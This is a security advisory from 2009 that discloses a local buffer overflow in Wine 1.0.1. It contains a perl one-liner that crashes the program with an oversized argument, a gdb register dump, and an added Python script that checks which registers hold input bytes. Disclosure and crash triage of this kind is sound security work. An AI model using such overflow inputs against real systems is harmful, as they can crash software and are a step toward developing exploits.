Wine 1.0.1 Buffer Overflow

2009-03-30T00:00:00
ID PACKETSTORM:76170
Type packetstorm
Reporter Jonathan Salwan
Modified 2009-03-30T00:00:00

Description

                                        
                                            `Linux Wine v1.0.1 Local Buffer Overflow (PoC)   
  
Author : Jonathan Salwan  
Mail : submit [AT] shell-storm.org  
Web : http://www.shell-storm.org  
  
  
Wine installed/tested with:
- Ubuntu 8.10 (kernel 2.6.27)
- gcc version 4.3.2 (Ubuntu 4.3.2-1ubuntu12)
  
  
Proof of Concept:  
--------------------------------------------------------------------------------------  
  
submit@submit-laptop:~$ wine --version  
wine-1.0.1  
submit@submit-laptop:~$ wine `perl -e "print('AAAA'x10000)"`  
Erreur de segmentation  
submit@submit-laptop:~$  
  
--------------------------------------------------------------------------------------  
  
submit@submit-laptop:~$ gdb /usr/bin/wine  
GNU gdb 6.8-debian  
Copyright (C) 2008 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "i486-linux-gnu"...  
(no debugging symbols found)  
(gdb) run `perl -e "print('AAAA'x10000)"`  
Starting program: /usr/bin/wine `perl -e "print('AAAA'x10000)"`  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
[Thread debugging using libthread_db enabled]  
(no debugging symbols found)  
(no debugging symbols found)  
[New Thread 0xb7c346b0 (LWP 11082)]  
[New Thread 0xb7c33b90 (LWP 11087)]  
[Thread 0xb7c33b90 (LWP 11087) exited]  
[New process 11082]  
Executing new program: /usr/bin/wine-preloader  
(no debugging symbols found)  
warning: Cannot initialize thread debugging library: generic error  
warning: Cannot initialize thread debugging library: generic error  
[New process 11082]  
  
Program received signal SIGSEGV, Segmentation fault.  
0x7bc42e9e in ?? ()  
(gdb) i r  
eax 0x110108 1114376  
ecx 0x17170 94576  
edx 0x410041 4259905  
ebx 0x7bc8aff4 2076749812  
esp 0xbfded9c0 0xbfded9c0  
ebp 0xbfded9e8 0xbfded9e8  
esi 0x1411d0 1315280  
edi 0x158340 1409856  
eip 0x7bc42e9e 0x7bc42e9e  
eflags 0x10202 [ IF RF ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x33 51  
gs 0x3b 59  
(gdb)  
--------------------------------------------------------------------------------------  
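The register dump above is the only data the advisory gives about the crash. As an added triage helper (not part of the original advisory), the script below parses the `i r` output and flags registers whose value is a plain copy of the input fill byte, either as four ANSI bytes (0x41414141, "AAAA") or as UTF-16LE (0x00410041, "AA" widened). On this dump it reports only edx, which suggests the argument had already been converted to a wide string when the fault occurred, while eip does not carry the pattern.

```python
import re

# Register dump copied from the gdb 'i r' output in the advisory above.
GDB_REGISTERS = """\
eax 0x110108 1114376
ecx 0x17170 94576
edx 0x410041 4259905
ebx 0x7bc8aff4 2076749812
esp 0xbfded9c0 0xbfded9c0
ebp 0xbfded9e8 0xbfded9e8
esi 0x1411d0 1315280
edi 0x158340 1409856
eip 0x7bc42e9e 0x7bc42e9e
eflags 0x10202 [ IF RF ]
"""

# 32-bit general-purpose registers as printed by gdb on i486-linux-gnu.
GPRS = {"eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi", "eip"}


def parse_registers(text):
    """Return {name: int value} for the general-purpose registers in an 'i r' dump."""
    regs = {}
    for line in text.splitlines():
        m = re.match(r"\s*(\w+)\s+(0x[0-9a-fA-F]+)", line)
        if m and m.group(1) in GPRS:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs


def pattern_taint(value, fill=0x41):
    """Classify a 32-bit value against the input fill byte.

    'ansi' : all four bytes are the fill byte (0x41414141, "AAAA" as char).
    'wide' : bytes alternate fill/0x00 (0x00410041, "AA" as UTF-16LE).
    None   : the value is not a plain copy of the input.
    """
    b = value.to_bytes(4, "little")
    if b == bytes([fill] * 4):
        return "ansi"
    if b == bytes([fill, 0, fill, 0]):
        return "wide"
    return None


def triage(text, fill=0x41):
    """Map each register holding input-derived bytes to its encoding ('ansi'/'wide')."""
    regs = parse_registers(text)
    return {n: pattern_taint(v, fill) for n, v in regs.items() if pattern_taint(v, fill)}
```

Running `triage(GDB_REGISTERS)` returns `{'edx': 'wide'}`, so the crash shows input bytes in a data register only, not in the instruction pointer.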